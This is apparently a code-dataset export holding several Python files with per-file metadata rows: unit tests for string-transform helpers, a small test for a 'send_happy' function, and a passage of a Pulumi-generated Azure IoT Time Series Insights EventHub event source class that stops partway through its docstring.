            ['df6f37', 'bf5f2f', '9f4f27', '7f3f1f',
             '5f2f17', '3f1f0f', '1f0f07'] +
            ['000000'] * 11 +
            ['3f1f0f']
        )
        for tick, color in enumerate(expected_colors):
            # assertEqual, not the deprecated assertEquals alias; the msg
            # argument pinpoints the failing tick.
            self.assertEqual('fill 1,%s,20,1' % color,
                             self.m_Star.handleTick(),
                             'unexpected command at tick %d' % tick)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 54.157895
| 88
| 0.733074
| 449
| 3,087
| 4.944321
| 0.095768
| 0.076577
| 0.133784
| 0.237387
| 0.896847
| 0.896847
| 0.896847
| 0.896847
| 0.896847
| 0.896847
| 0
| 0.093862
| 0.092323
| 3,087
| 56
| 89
| 55.125
| 0.69843
| 0
| 0
| 0.642857
| 0
| 0
| 0.185353
| 0
| 0
| 0
| 0
| 0
| 0.738095
| 1
| 0.071429
| false
| 0
| 0.047619
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
65b2e2259023476cfd87115de828b50bdbceee54
| 13,963
|
py
|
Python
|
transforms_tests.py
|
Sylvaner/PyConverter
|
071241c049b13dd891a89ea631f76ff1043100c3
|
[
"Apache-2.0"
] | null | null | null |
transforms_tests.py
|
Sylvaner/PyConverter
|
071241c049b13dd891a89ea631f76ff1043100c3
|
[
"Apache-2.0"
] | null | null | null |
transforms_tests.py
|
Sylvaner/PyConverter
|
071241c049b13dd891a89ea631f76ff1043100c3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
"""
Test transforms modules.
"""
__author__ = "Sylvain Dangin"
__licence__ = "Apache 2.0"
__version__ = "1.0"
__maintainer__ = "Sylvain Dangin"
__email__ = "sylvain.dangin@gmail.com"
__status__ = "Development"
import os
import sys
import unittest
class TransformsTest(unittest.TestCase):
    """Unit tests for the pluggable string transforms in the ``transforms``
    package.

    Each transform module exposes a ``transform`` callable.  Every group
    below checks the normal case plus the usual edge cases: empty string,
    whitespace-only string, and non-string (list) input, for which the
    tests only assert that a list comes back.  Imports are done inside
    each test so a broken transform module fails only its own tests.
    """

    ################################################################################
    #                         Tests first_char transform                           #
    ################################################################################
    def test_first_char_word(self):
        from transforms.first_char import first_char
        self.assertEqual('H', first_char.transform('Hello'))

    def test_first_char_sentence(self):
        from transforms.first_char import first_char
        self.assertEqual('H', first_char.transform('Hello the world!!!'))

    def test_first_char_only_space(self):
        from transforms.first_char import first_char
        self.assertEqual(' ', first_char.transform(' '))

    def test_first_char_empty_string(self):
        from transforms.first_char import first_char
        self.assertEqual('', first_char.transform(''))

    def test_first_char_not_a_string(self):
        from transforms.first_char import first_char
        self.assertIsInstance(first_char.transform(['Hello', 'the', 'world']), list)

    ################################################################################
    #                         Tests first_word transform                           #
    ################################################################################
    def test_first_word_one_word(self):
        from transforms.first_word import first_word
        self.assertEqual('Hello', first_word.transform('Hello'))

    def test_first_word_sentence(self):
        from transforms.first_word import first_word
        self.assertEqual('Hello', first_word.transform('Hello the world!!!'))

    def test_first_word_multiple_spaces(self):
        # NOTE(review): input is identical to the "sentence" case above; the
        # intended multiple spaces may have been collapsed somewhere --
        # verify against the upstream repository.
        from transforms.first_word import first_word
        self.assertEqual('Hello', first_word.transform('Hello the world!!!'))

    def test_first_word_only_spaces(self):
        from transforms.first_word import first_word
        self.assertEqual('', first_word.transform(' '))

    def test_first_word_empty_string(self):
        from transforms.first_word import first_word
        self.assertEqual('', first_word.transform(''))

    def test_first_word_not_a_string(self):
        from transforms.first_word import first_word
        self.assertIsInstance(first_word.transform(['Hello', 'the', 'world']), list)

    ################################################################################
    #                          Tests last_word transform                           #
    ################################################################################
    def test_last_word_one_word(self):
        from transforms.last_word import last_word
        self.assertEqual('Hello', last_word.transform('Hello'))

    def test_last_word_sentence(self):
        from transforms.last_word import last_word
        self.assertEqual('world', last_word.transform('Hello the world'))

    def test_last_word_sentence_with_ponctuation(self):
        from transforms.last_word import last_word
        self.assertEqual('world', last_word.transform('Hello the world!!!'))
        self.assertEqual('world', last_word.transform('Hello the world!'))
        self.assertEqual('world', last_word.transform('Hello the world !'))
        self.assertEqual('world', last_word.transform('Hello the world ?'))
        self.assertEqual('world', last_word.transform('Hello the world.'))
        self.assertEqual('world', last_word.transform('Hello the world,'))
        self.assertEqual('world', last_word.transform('Hello the world, ?'))

    def test_last_word_multiple_spaces(self):
        # NOTE(review): same single-spaced input as the "sentence" case;
        # intended multiple spaces may have been collapsed -- verify.
        from transforms.last_word import last_word
        self.assertEqual('world', last_word.transform('Hello the world'))

    def test_last_word_only_spaces(self):
        from transforms.last_word import last_word
        self.assertEqual('', last_word.transform(' '))

    def test_last_word_empty_string(self):
        from transforms.last_word import last_word
        self.assertEqual('', last_word.transform(''))

    def test_last_word_not_a_string(self):
        from transforms.last_word import last_word
        self.assertIsInstance(last_word.transform(['Hello', 'the', 'world']), list)

    ################################################################################
    #                        Tests remove_digits transform                         #
    ################################################################################
    def test_remove_digits(self):
        from transforms.remove_digits import remove_digits
        self.assertEqual('Hell te wrd', remove_digits.transform('Hell0 t4e w0r1d'))
        self.assertEqual('efa', remove_digits.transform('23e99f00a'))
        self.assertEqual('', remove_digits.transform('329840912'))

    def test_remove_digits_without_digits(self):
        from transforms.remove_digits import remove_digits
        self.assertEqual('Hello the world', remove_digits.transform('Hello the world'))

    def test_remove_digits_only_spaces(self):
        from transforms.remove_digits import remove_digits
        self.assertEqual(' ', remove_digits.transform(' '))

    def test_remove_digits_empty_string(self):
        from transforms.remove_digits import remove_digits
        self.assertEqual('', remove_digits.transform(''))

    def test_remove_digits_not_a_string(self):
        from transforms.remove_digits import remove_digits
        self.assertIsInstance(remove_digits.transform(['Hello', 'the', 'world']), list)

    ################################################################################
    #                       Tests remove_last_word transform                       #
    ################################################################################
    def test_remove_last_word(self):
        from transforms.remove_last_word import remove_last_word
        self.assertEqual('Hello the', remove_last_word.transform('Hello the world'))

    def test_remove_last_word_one_word(self):
        from transforms.remove_last_word import remove_last_word
        self.assertEqual('', remove_last_word.transform('Hello'))

    def test_remove_last_word_with_extra_space(self):
        from transforms.remove_last_word import remove_last_word
        self.assertEqual('Hello the', remove_last_word.transform('Hello the world '))
        self.assertEqual('', remove_last_word.transform('Hello '))

    def test_remove_last_word_only_spaces(self):
        from transforms.remove_last_word import remove_last_word
        self.assertEqual('', remove_last_word.transform(' '))

    def test_remove_last_word_empty_string(self):
        from transforms.remove_last_word import remove_last_word
        self.assertEqual('', remove_last_word.transform(''))

    def test_remove_last_word_not_a_string(self):
        from transforms.remove_last_word import remove_last_word
        self.assertIsInstance(remove_last_word.transform(['Hello', 'the', 'world']), list)

    ################################################################################
    #                          Tests to_lower transform                            #
    ################################################################################
    def test_to_lower(self):
        from transforms.to_lower import to_lower
        self.assertEqual('hello the world', to_lower.transform('Hello the World'))

    def test_to_lower_one_word(self):
        from transforms.to_lower import to_lower
        self.assertEqual('hello', to_lower.transform('Hello'))

    def test_to_lower_already_done(self):
        from transforms.to_lower import to_lower
        self.assertEqual('hello the world', to_lower.transform('hello the world'))

    def test_to_lower_only_spaces(self):
        from transforms.to_lower import to_lower
        self.assertEqual(' ', to_lower.transform(' '))

    def test_to_lower_empty_string(self):
        from transforms.to_lower import to_lower
        self.assertEqual('', to_lower.transform(''))

    def test_to_lower_not_a_string(self):
        from transforms.to_lower import to_lower
        self.assertIsInstance(to_lower.transform(['Hello', 'the', 'world']), list)

    ################################################################################
    #                          Tests to_upper transform                            #
    ################################################################################
    def test_to_upper(self):
        from transforms.to_upper import to_upper
        self.assertEqual('HELLO THE WORLD', to_upper.transform('Hello the World'))

    def test_to_upper_one_word(self):
        from transforms.to_upper import to_upper
        self.assertEqual('HELLO', to_upper.transform('Hello'))

    def test_to_upper_already_done(self):
        from transforms.to_upper import to_upper
        self.assertEqual('HELLO THE WORLD', to_upper.transform('HELLO THE WORLD'))

    def test_to_upper_only_spaces(self):
        from transforms.to_upper import to_upper
        self.assertEqual(' ', to_upper.transform(' '))

    def test_to_upper_empty_string(self):
        from transforms.to_upper import to_upper
        self.assertEqual('', to_upper.transform(''))

    def test_to_upper_not_a_string(self):
        from transforms.to_upper import to_upper
        self.assertIsInstance(to_upper.transform(['Hello', 'the', 'world']), list)

    ################################################################################
    #                            Tests trim transform                              #
    ################################################################################
    def test_trim(self):
        from transforms.trim import trim
        self.assertEqual('Hello the World', trim.transform(' Hello the World '))

    def test_trim_one_word(self):
        from transforms.trim import trim
        self.assertEqual('Hello', trim.transform(' Hello '))

    def test_trim_already_done(self):
        from transforms.trim import trim
        self.assertEqual('hello the world', trim.transform('hello the world'))

    def test_trim_only_spaces(self):
        from transforms.trim import trim
        self.assertEqual('', trim.transform(' '))

    def test_trim_empty_string(self):
        from transforms.trim import trim
        self.assertEqual('', trim.transform(''))

    def test_trim_not_a_string(self):
        from transforms.trim import trim
        self.assertIsInstance(trim.transform(['Hello', 'the', 'world']), list)

    ################################################################################
    #                    Tests up_all_first_letters transform                      #
    ################################################################################
    def test_up_all_first_letters(self):
        from transforms.up_all_first_letters import up_all_first_letters
        self.assertEqual('Hello The World', up_all_first_letters.transform('hello the world'))
        self.assertEqual('Hello The World', up_all_first_letters.transform('Hello the world'))

    def test_up_all_first_letters_one_word(self):
        from transforms.up_all_first_letters import up_all_first_letters
        self.assertEqual('Hello', up_all_first_letters.transform('hello'))

    def test_up_all_first_letters_already_done(self):
        from transforms.up_all_first_letters import up_all_first_letters
        self.assertEqual('Hello The World', up_all_first_letters.transform('Hello The World'))

    def test_up_all_first_letters_only_spaces(self):
        from transforms.up_all_first_letters import up_all_first_letters
        self.assertEqual(' ', up_all_first_letters.transform(' '))

    def test_up_all_first_letters_empty_string(self):
        from transforms.up_all_first_letters import up_all_first_letters
        self.assertEqual('', up_all_first_letters.transform(''))

    def test_up_all_first_letters_not_a_string(self):
        from transforms.up_all_first_letters import up_all_first_letters
        self.assertIsInstance(up_all_first_letters.transform(['Hello', 'the', 'world']), list)

    ################################################################################
    #                       Tests up_first_letter transform                        #
    ################################################################################
    def test_up_first_letter(self):
        from transforms.up_first_letter import up_first_letter
        self.assertEqual('Hello the world', up_first_letter.transform('hello the world'))
        self.assertEqual('Hello the world', up_first_letter.transform('Hello the world'))

    def test_up_first_letter_one_word(self):
        from transforms.up_first_letter import up_first_letter
        self.assertEqual('Hello', up_first_letter.transform('hello'))

    def test_up_first_letter_already_done(self):
        from transforms.up_first_letter import up_first_letter
        self.assertEqual('Hello the world', up_first_letter.transform('hello the world'))

    def test_up_first_letter_only_spaces(self):
        from transforms.up_first_letter import up_first_letter
        self.assertEqual(' ', up_first_letter.transform(' '))

    def test_up_first_letter_empty_string(self):
        from transforms.up_first_letter import up_first_letter
        self.assertEqual('', up_first_letter.transform(''))

    def test_up_first_letter_not_a_string(self):
        from transforms.up_first_letter import up_first_letter
        self.assertIsInstance(up_first_letter.transform(['Hello', 'the', 'world']), list)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 47.172297
| 94
| 0.605386
| 1,534
| 13,963
| 5.159061
| 0.054107
| 0.061663
| 0.134193
| 0.102856
| 0.920394
| 0.884508
| 0.835734
| 0.772176
| 0.749431
| 0.732499
| 0
| 0.002142
| 0.197522
| 13,963
| 295
| 95
| 47.332203
| 0.70415
| 0.05579
| 0
| 0.455
| 0
| 0
| 0.099044
| 0.002085
| 0
| 0
| 0
| 0
| 0.35
| 1
| 0.295
| false
| 0
| 0.31
| 0
| 0.61
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
65ddb64c00be49464455044e58ae18091ad0c8ba
| 129
|
py
|
Python
|
tests/test_all.py
|
AnotherCat/happy-birthday-spam
|
ab21657c33f0345839693dc8bed3efd936361022
|
[
"MIT"
] | null | null | null |
tests/test_all.py
|
AnotherCat/happy-birthday-spam
|
ab21657c33f0345839693dc8bed3efd936361022
|
[
"MIT"
] | null | null | null |
tests/test_all.py
|
AnotherCat/happy-birthday-spam
|
ab21657c33f0345839693dc8bed3efd936361022
|
[
"MIT"
] | null | null | null |
from main import send_happy
def test_send_happy():
    """Check send_happy against two known input/output pairs."""
    cases = [
        ((5, 0.0005), 0.07),
        ((5, 1), 0.9),
    ]
    for args, want in cases:
        assert send_happy(*args) == want
| 18.428571
| 40
| 0.674419
| 24
| 129
| 3.416667
| 0.583333
| 0.439024
| 0.365854
| 0.390244
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126214
| 0.20155
| 129
| 6
| 41
| 21.5
| 0.669903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
65e5408fc42dbb76bd27b80e87eb05170bcde303
| 38,615
|
py
|
Python
|
sdk/python/pulumi_azure/iot/time_series_insights_event_source_eventhub.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/iot/time_series_insights_event_source_eventhub.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/iot/time_series_insights_event_source_eventhub.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['TimeSeriesInsightsEventSourceEventhubArgs', 'TimeSeriesInsightsEventSourceEventhub']
@pulumi.input_type
class TimeSeriesInsightsEventSourceEventhubArgs:
def __init__(__self__, *,
consumer_group_name: pulumi.Input[str],
environment_id: pulumi.Input[str],
event_source_resource_id: pulumi.Input[str],
eventhub_name: pulumi.Input[str],
namespace_name: pulumi.Input[str],
shared_access_key: pulumi.Input[str],
shared_access_key_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timestamp_property_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a TimeSeriesInsightsEventSourceEventhub resource.
:param pulumi.Input[str] consumer_group_name: Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
:param pulumi.Input[str] environment_id: Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to created.
:param pulumi.Input[str] event_source_resource_id: Specifies the resource id where events will be coming from.
:param pulumi.Input[str] eventhub_name: Specifies the name of the EventHub which will be associated with this resource.
:param pulumi.Input[str] namespace_name: Specifies the EventHub Namespace name.
:param pulumi.Input[str] shared_access_key: Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
:param pulumi.Input[str] shared_access_key_name: Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] timestamp_property_name: Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
"""
pulumi.set(__self__, "consumer_group_name", consumer_group_name)
pulumi.set(__self__, "environment_id", environment_id)
pulumi.set(__self__, "event_source_resource_id", event_source_resource_id)
pulumi.set(__self__, "eventhub_name", eventhub_name)
pulumi.set(__self__, "namespace_name", namespace_name)
pulumi.set(__self__, "shared_access_key", shared_access_key)
pulumi.set(__self__, "shared_access_key_name", shared_access_key_name)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if timestamp_property_name is not None:
pulumi.set(__self__, "timestamp_property_name", timestamp_property_name)
@property
@pulumi.getter(name="consumerGroupName")
def consumer_group_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
"""
return pulumi.get(self, "consumer_group_name")
@consumer_group_name.setter
def consumer_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "consumer_group_name", value)
@property
@pulumi.getter(name="environmentId")
def environment_id(self) -> pulumi.Input[str]:
"""
Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to created.
"""
return pulumi.get(self, "environment_id")
@environment_id.setter
def environment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "environment_id", value)
@property
@pulumi.getter(name="eventSourceResourceId")
def event_source_resource_id(self) -> pulumi.Input[str]:
"""
Specifies the resource id where events will be coming from.
"""
return pulumi.get(self, "event_source_resource_id")
@event_source_resource_id.setter
def event_source_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "event_source_resource_id", value)
@property
@pulumi.getter(name="eventhubName")
def eventhub_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the EventHub which will be associated with this resource.
"""
return pulumi.get(self, "eventhub_name")
@eventhub_name.setter
def eventhub_name(self, value: pulumi.Input[str]):
pulumi.set(self, "eventhub_name", value)
@property
@pulumi.getter(name="namespaceName")
def namespace_name(self) -> pulumi.Input[str]:
"""
Specifies the EventHub Namespace name.
"""
return pulumi.get(self, "namespace_name")
@namespace_name.setter
def namespace_name(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace_name", value)
    @property
    @pulumi.getter(name="sharedAccessKey")
    def shared_access_key(self) -> pulumi.Input[str]:
        """
        Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
        """
        return pulumi.get(self, "shared_access_key")

    @shared_access_key.setter
    def shared_access_key(self, value: pulumi.Input[str]):
        """Set the Shared Access Policy key value (secret material)."""
        pulumi.set(self, "shared_access_key", value)
    @property
    @pulumi.getter(name="sharedAccessKeyName")
    def shared_access_key_name(self) -> pulumi.Input[str]:
        """
        Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
        """
        return pulumi.get(self, "shared_access_key_name")

    @shared_access_key_name.setter
    def shared_access_key_name(self, value: pulumi.Input[str]):
        """Set the name of the Shared Access key."""
        pulumi.set(self, "shared_access_key_name", value)
    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        """Set the Azure location of the resource."""
        pulumi.set(self, "location", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        """Set the Event Source name."""
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        """Set the tag mapping assigned to the resource."""
        pulumi.set(self, "tags", value)
    @property
    @pulumi.getter(name="timestampPropertyName")
    def timestamp_property_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
        """
        return pulumi.get(self, "timestamp_property_name")

    @timestamp_property_name.setter
    def timestamp_property_name(self, value: Optional[pulumi.Input[str]]):
        """Set the event property used as the event source's timestamp."""
        pulumi.set(self, "timestamp_property_name", value)
@pulumi.input_type
class _TimeSeriesInsightsEventSourceEventhubState:
    """State-input type backing `TimeSeriesInsightsEventSourceEventhub.get` lookups.

    Every property is optional because a state lookup may be qualified by any
    subset of the resource's properties.
    """

    def __init__(__self__, *,
                 consumer_group_name: Optional[pulumi.Input[str]] = None,
                 environment_id: Optional[pulumi.Input[str]] = None,
                 event_source_resource_id: Optional[pulumi.Input[str]] = None,
                 eventhub_name: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 namespace_name: Optional[pulumi.Input[str]] = None,
                 shared_access_key: Optional[pulumi.Input[str]] = None,
                 shared_access_key_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 timestamp_property_name: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering TimeSeriesInsightsEventSourceEventhub resources.
        :param pulumi.Input[str] consumer_group_name: Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
        :param pulumi.Input[str] environment_id: Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to be created.
        :param pulumi.Input[str] event_source_resource_id: Specifies the resource id where events will be coming from.
        :param pulumi.Input[str] eventhub_name: Specifies the name of the EventHub which will be associated with this resource.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
        :param pulumi.Input[str] namespace_name: Specifies the EventHub Namespace name.
        :param pulumi.Input[str] shared_access_key: Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
        :param pulumi.Input[str] shared_access_key_name: Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
        :param pulumi.Input[str] timestamp_property_name: Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
        """
        # Record only the properties that were explicitly provided; absent ones
        # stay unset so they do not constrain the lookup.
        if consumer_group_name is not None:
            pulumi.set(__self__, "consumer_group_name", consumer_group_name)
        if environment_id is not None:
            pulumi.set(__self__, "environment_id", environment_id)
        if event_source_resource_id is not None:
            pulumi.set(__self__, "event_source_resource_id", event_source_resource_id)
        if eventhub_name is not None:
            pulumi.set(__self__, "eventhub_name", eventhub_name)
        if location is not None:
            pulumi.set(__self__, "location", location)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if namespace_name is not None:
            pulumi.set(__self__, "namespace_name", namespace_name)
        if shared_access_key is not None:
            pulumi.set(__self__, "shared_access_key", shared_access_key)
        if shared_access_key_name is not None:
            pulumi.set(__self__, "shared_access_key_name", shared_access_key_name)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if timestamp_property_name is not None:
            pulumi.set(__self__, "timestamp_property_name", timestamp_property_name)

    @property
    @pulumi.getter(name="consumerGroupName")
    def consumer_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the EventHub Consumer Group that holds the partitions from which events will be read.
        """
        return pulumi.get(self, "consumer_group_name")

    @consumer_group_name.setter
    def consumer_group_name(self, value: Optional[pulumi.Input[str]]):
        """Set the EventHub Consumer Group name that events are read from."""
        pulumi.set(self, "consumer_group_name", value)

    @property
    @pulumi.getter(name="environmentId")
    def environment_id(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the id of the IoT Time Series Insights Environment that the Event Source should be associated with. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "environment_id")

    @environment_id.setter
    def environment_id(self, value: Optional[pulumi.Input[str]]):
        """Set the associated Time Series Insights Environment id."""
        pulumi.set(self, "environment_id", value)

    @property
    @pulumi.getter(name="eventSourceResourceId")
    def event_source_resource_id(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the resource id where events will be coming from.
        """
        return pulumi.get(self, "event_source_resource_id")

    @event_source_resource_id.setter
    def event_source_resource_id(self, value: Optional[pulumi.Input[str]]):
        """Set the resource id that events originate from."""
        pulumi.set(self, "event_source_resource_id", value)

    @property
    @pulumi.getter(name="eventhubName")
    def eventhub_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the EventHub which will be associated with this resource.
        """
        return pulumi.get(self, "eventhub_name")

    @eventhub_name.setter
    def eventhub_name(self, value: Optional[pulumi.Input[str]]):
        """Set the name of the associated EventHub."""
        pulumi.set(self, "eventhub_name", value)

    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")

    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        """Set the Azure location of the resource."""
        pulumi.set(self, "location", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Azure IoT Time Series Insights EventHub Event Source. Changing this forces a new resource to be created. Must be globally unique.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        """Set the Event Source name."""
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="namespaceName")
    def namespace_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the EventHub Namespace name.
        """
        return pulumi.get(self, "namespace_name")

    @namespace_name.setter
    def namespace_name(self, value: Optional[pulumi.Input[str]]):
        """Set the EventHub Namespace name."""
        pulumi.set(self, "namespace_name", value)

    @property
    @pulumi.getter(name="sharedAccessKey")
    def shared_access_key(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the value of the Shared Access Policy key that grants the Time Series Insights service read access to the EventHub.
        """
        return pulumi.get(self, "shared_access_key")

    @shared_access_key.setter
    def shared_access_key(self, value: Optional[pulumi.Input[str]]):
        """Set the Shared Access Policy key value (secret material)."""
        pulumi.set(self, "shared_access_key", value)

    @property
    @pulumi.getter(name="sharedAccessKeyName")
    def shared_access_key_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Shared Access key that grants the Event Source access to the EventHub.
        """
        return pulumi.get(self, "shared_access_key_name")

    @shared_access_key_name.setter
    def shared_access_key_name(self, value: Optional[pulumi.Input[str]]):
        """Set the name of the Shared Access key."""
        pulumi.set(self, "shared_access_key_name", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A mapping of tags to assign to the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        """Set the tag mapping assigned to the resource."""
        pulumi.set(self, "tags", value)

    @property
    @pulumi.getter(name="timestampPropertyName")
    def timestamp_property_name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the value that will be used as the event source's timestamp. This value defaults to the event creation time.
        """
        return pulumi.get(self, "timestamp_property_name")

    @timestamp_property_name.setter
    def timestamp_property_name(self, value: Optional[pulumi.Input[str]]):
        """Set the event property used as the event source's timestamp."""
        pulumi.set(self, "timestamp_property_name", value)
class TimeSeriesInsightsEventSourceEventhub(pulumi.CustomResource):
    """Manages an Azure IoT Time Series Insights EventHub Event Source.

    Construction accepts either a `TimeSeriesInsightsEventSourceEventhubArgs`
    object or the individual properties as keyword arguments (see the two
    `__init__` overloads); existing resources can be adopted with `get`.
    """

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 consumer_group_name: Optional[pulumi.Input[str]] = None,
                 environment_id: Optional[pulumi.Input[str]] = None,
                 event_source_resource_id: Optional[pulumi.Input[str]] = None,
                 eventhub_name: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 namespace_name: Optional[pulumi.Input[str]] = None,
                 shared_access_key: Optional[pulumi.Input[str]] = None,
                 shared_access_key_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 timestamp_property_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages an Azure IoT Time Series Insights EventHub Event Source.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_event_hub_namespace = azure.eventhub.EventHubNamespace("exampleEventHubNamespace",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            sku="Standard")
        example_event_hub = azure.eventhub.EventHub("exampleEventHub",
            namespace_name=example_event_hub_namespace.name,
